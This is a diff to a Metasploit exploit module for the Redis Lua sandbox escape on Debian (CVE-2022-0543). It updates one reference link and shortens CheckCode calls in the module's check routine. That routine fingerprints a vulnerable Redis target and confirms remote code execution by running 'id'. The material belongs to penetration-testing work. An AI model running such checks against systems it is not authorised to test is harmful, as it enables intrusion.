@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.lua.org/pil/8.2.html'],
           [ 'URL', 'https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce' ],
           [ 'URL', 'https://www.debian.org/security/2022/dsa-5081' ],
-          [ 'URL', 'https://ubuntu.com/security/CVE-2022-0543' ]
+          [ 'URL', 'http://web.archive.org/web/20240910172732/https://ubuntu.com/security/CVE-2022-0543' ]
         ],
         'DisclosureDate' => '2022-02-18',
         'Platform' => ['unix', 'linux'],
@@ -142,21 +142,21 @@ class MetasploitModule < Msf::Exploit::Remote
     # We could probably fingerprint the build_id as well, but I'm worried I'll overlook at
     # package somewhere and it's nice to get final verification via exploitation anyway.
     info_output = redis_command('INFO')
-    return Exploit::CheckCode::Unknown('Failed authentication.') if info_output.nil?
-    return Exploit::CheckCode::Safe('Unaffected operating system') unless info_output.include? 'os:Linux'
-    return Exploit::CheckCode::Safe('Invalid git sha1') unless info_output.include? 'redis_git_sha1:00000000'
+    return CheckCode::Unknown('Failed authentication.') if info_output.nil?
+    return CheckCode::Safe('Unaffected operating system') unless info_output.include? 'os:Linux'
+    return CheckCode::Safe('Invalid git sha1') unless info_output.include? 'redis_git_sha1:00000000'
 
     redis_version = info_output[/redis_version:(?<redis_version>\S+)/, :redis_version]
-    return Exploit::CheckCode::Safe('Could not extract a version number') if redis_version.nil?
-    return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) < Rex::Version.new('5.0.0')
-    return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) >= Rex::Version.new('6.1.0')
-    return Exploit::CheckCode::Unknown('Unsupported architecture') unless info_output.include? 'x86_64'
+    return CheckCode::Safe('Could not extract a version number') if redis_version.nil?
+    return CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) < Rex::Version.new('5.0.0')
+    return CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) >= Rex::Version.new('6.1.0')
+    return CheckCode::Unknown('Unsupported architecture') unless info_output.include? 'x86_64'
 
     # okay, looks like a worthy candidate. Attempt exploitation.
     result = do_popen('id')
-    return Exploit::CheckCode::Vulnerable("Successfully executed the 'id' command.") unless result.nil? || result[/uid=.+ gid=.+ groups=.+/].nil?
+    return CheckCode::Vulnerable("Successfully executed the 'id' command.") unless result.nil? || result[/uid=.+ gid=.+ groups=.+/].nil?
 
-    Exploit::CheckCode::Safe("Could not execute 'id' on the remote target.")
+    CheckCode::Safe("Could not execute 'id' on the remote target.")
   ensure
     disconnect
   end
